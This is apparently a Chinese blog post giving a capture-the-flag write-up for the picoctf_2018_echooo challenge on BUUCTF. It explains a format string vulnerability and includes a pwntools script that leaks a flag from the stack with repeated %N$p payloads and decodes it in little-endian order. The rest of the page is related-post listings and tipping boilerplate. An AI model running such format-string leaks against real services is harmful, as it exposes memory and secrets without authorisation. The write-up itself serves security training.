picoctf_2018_echooo

最新推荐文章于 2024-08-28 09:33:10 发布
最新推荐文章于 2024-08-28 09:33:10 发布
阅读量351 收藏
点赞数 1
分类专栏: buuctf 题目 文章标签: 安全 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/123441743
版权

picoctf_2018_echooo

查看保护
在这里插入图片描述
在这里插入图片描述
格式化字符串漏洞
攻击思路:flag在栈上,所以直接格式化字符串泄露即可,但是在这里需要注意小端序
在这里插入图片描述
在28的偏移开始,这时笔者直接用循环来爆破的,最后的结果为11,因为12的时候是null。
注意:小端序,两种方式,直接倒着输出,或者取每一个字节然后chr倒着拼接。

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 26540)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

flag = ''

for i in range(11):
    print('[+] i = ' + str(i))
    p1 = '%' + str(i + 27) + '$p'
    r.sendline(p1)
    r.recvuntil('> 0x')
    addr = int((r.recvuntil('\n')[:-1]), 16)
    a = (addr & 0xff000000) >> 24
    b = (addr & 0x00ff0000) >> 16
    c = (addr & 0x0000ff00) >> 8
    d = addr & 0x000000ff
    flag += chr(d) + chr(c) + chr(b) + chr(a)

print('[+] flag = ' + flag)

r.interactive()
z1r0.
关注
专栏目录
C语言 关于n*n乘法口诀表(99乘法口诀等都可以实现)
weixin_47648626的博客
11-17 6443
C语言 关于DIY乘法口诀表一.理清概念1.基础概念二.思路方法1.简单思路2.具体思路3.核心算法三.实际操作1.程序实现2.运行结果四.总结 一.理清概念 1.基础概念 首先:九九乘法口诀表 1、九九表一般只用一到九这9个数字。 2、九九表包含乘法的可交换性 3、朗读时有节奏,便于记忆全表。   而自定义乘法口诀表(DIY口诀表)可以实现: n*n乘法口诀表 更加灵活而且有趣,下面带大家来详细学习 二.思路方法 1.简单思路 实现一个函数打印乘法口诀表,口诀表的行数和列数自己指定. (输入
bpftrace:这个超好用的 Linux 性能工具,你还不知道?
osfront的博客
01-14 732
bpftrace:这个超好用的 Linux 性能工具,你还不知道? 简介 bpftrace 是 Linux 高级追踪工具和语言。该工具基于 eBPF 和 BBC 实现了通过探针机制采集内核和程序运行的信息,然后用图表等方式将信息展示出来,帮助开发者找到隐藏较深的 Bug、安全问题和性能瓶颈。 bpftrace 使用 LLVM 作为后端,将脚本编译为 BPF 字节码,并利用 BCC 与 Linux BPF 系统交互,以及现有的 Linux 跟踪功能:内核动态跟踪(kprobes)、用户级动态跟踪(uprobe
picoCTF-2020-撰写:picoCTF 2020解决方案的撰写
02-21
picoCTF 2020撰写 此存储库包含picoCTF 2020的字样,提示和解决方案。每个文件夹对每个类别都有相应的问题。 麻省理工学院 版权所有2021 Adam Jeniski和Caleb Garrick 特此免费授予获得该软件和相关文档文件(“软件”)副本的任何人无限制使用软件的权利,包括但不限于使用,复制,修改,合并的权利,发布,分发,再许可和/或出售本软件的副本,并允许具备软件的人员这样做,但须满足以下条件: 以上版权声明和本许可声明应包含在本软件的所有副本或大部分内容中。 该软件按“原样”提供,不提供任何形式的明示或暗示担保,包括但不限于对适销性,特定目的的适用性和非侵权性的担保。 无论是由于软件,使用或其他方式产生的,与之有关或与之有关的合同,侵权或其他形式的任何索赔,损害或其他责任,作者或版权所有者概不负责。软件。
推荐开源项目:picoCTF —— 打造你的专属网络安全竞赛平台
最新发布
gitblog_00112的博客
08-28 353
推荐开源项目:picoCTF —— 打造你的专属网络安全竞赛平台 picoCTFThe platform used to run picoCTF 2019.项目地址:https://gitcode.com/gh_mirrors/pi/picoCTF 项目概览 在网络安全领域,Capture The Flag(CTF)赛事以其独特的挑战性和教育意义而备受推崇。picoCTF 正是一个曾经用于运行2...
picoctf_2018_echooo(fmt)
m0_51251108的博客
11-19 368
picoctf_2018_echooo 这题还是蛮有意思的 程序分析: 它已经读取flag在栈上了,我们用格式字符串泄露出来flag就好 要写个脚本转换下,倒着组合一下 exp: from pwn import* #r=process('./PicoCTF_2018_echooo') r=remote('node4.buuoj.cn',29996) offest=11+(0x8c-0x4c)/4 print offest flag='' for i in range(11): payload='
[BUUCTF] picoctf_2018_echo back
zyxx_wjc的博客
03-15 2895
BUUCTF picoctf_2018_echo back
C语言 关于判断闰年
weixin_47648626的博客
11-17 2364
关于判断闰年一. 理清概念闰年的概念二.思路方法1.简单思路2.核心算法三.实际操作A.直接编写判断语句程序实现B.使用函数方法程序实现4.总结 一. 理清概念 闰年的概念 闰年是公历中的名词, 闰年分为普通闰年和世纪闰年 普通闰年:公历年份是4的倍数的,且不是100的倍数,为普通闰年。(如2004年就是闰年); 世纪闰年:公历年份是整百数的,必须是400的倍数才是世纪闰年(如1900年不是世纪闰年,2000年是世纪闰年); 二.思路方法 1.简单思路 由概念我们可以得出闰年的判断方法: 该整数能被4
C语言 关于递归和非递归实现第N个斐波那契数
weixin_47648626的博客
11-24 525
C语言 关于DIY乘法口诀表一.理清概念概念二.思路方法1.简单思路2.核心算法三.实际操作1.程序实现2.运行结果 一.理清概念 概念 二.思路方法 1.简单思路 2.核心算法 三.实际操作 1.程序实现 2.运行结果 ...
picoctf-Scavenger Hunt wp
m0_62851980的博客
03-27 333
打开网址先f12查看源代码,在body中看到:<!-- Here's the first part of the flag: picoCTF{t --> 明显flag分为好几个部分,一个一个找嘛: 查看网页时What一行下面给了一部分提示: What I used these to make this site: HTML CSS JS (JavaScript) 而在源代码中能看到mycss.css和myjs.js,那先在网址后输入/mycss.css,就能看到一部分代码:
picoCTF,Binary Exploitation,二进制类,23/37
Allezima阿力代码
02-10 1231
记录一下自己做的CTF,最初将所有题目放在一个帖子里,帖子太长了,为了方便后期编辑和阅读。2023年02月10日,将帖子拆分……
picoCTF,Reverse Engineering,逆向类,42/55
Allezima阿力代码
02-10 1821
记录一下自己做的CTF,最初将所有题目放在一个帖子里,帖子太长了,为了方便后期编辑和阅读。2023年02月10日,将帖子拆分……
picoCTF,General Skills,基本技能类,34/34
Allezima阿力代码
12-28 2066
自己做的CTF,记录一下。后期不断编辑。
picoctf——Insp3ct0r wp
m0_62851980的博客
03-25 342
打开网页没有什么信息,直接f12: 提示的很清楚了: <!-- Html is neat. Anyways have 1/3 of the flag: picoCTF{tru3_d3 --> 这一部分的注释告诉我们flag被分为了三部分,而已知: so,剩下的flag必在css和js里 用Ctrl r刷新网络,圈出来css和js: 可以知道myjs.js有一部分flag(3/3),直接网址输入myjs.js查看即可,同理,我们在查看器查看源码,可以看到css的名称..
picoCTF,Cryptography,密码类,40/50
Allezima阿力代码
02-10 2131
记录一下自己做的CTF,最初将所有题目放在一个帖子里,帖子太长了,为了方便后期编辑和阅读。2023年02月10日,将帖子拆分……
picoCTF,Forensics,取证类,43/50
Allezima阿力代码
02-10 2367
记录一下自己做的CTF,最初将所有题目放在一个帖子里,帖子太长了,为了方便后期编辑和阅读。2023年02月10日,将帖子拆分……
PicoCTF——Most Cookie思路讲解
npu2022303155的博客
04-25 947
1. 并没有手把手的步骤,只有一些经验。 2. 会有一些抓包图片来帮助理解,只是不知道有没有多此一举。
picoCTF - Day 1 - Warm up
0pr
08-30 524
picoCTF - Day 1 - Warm up
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值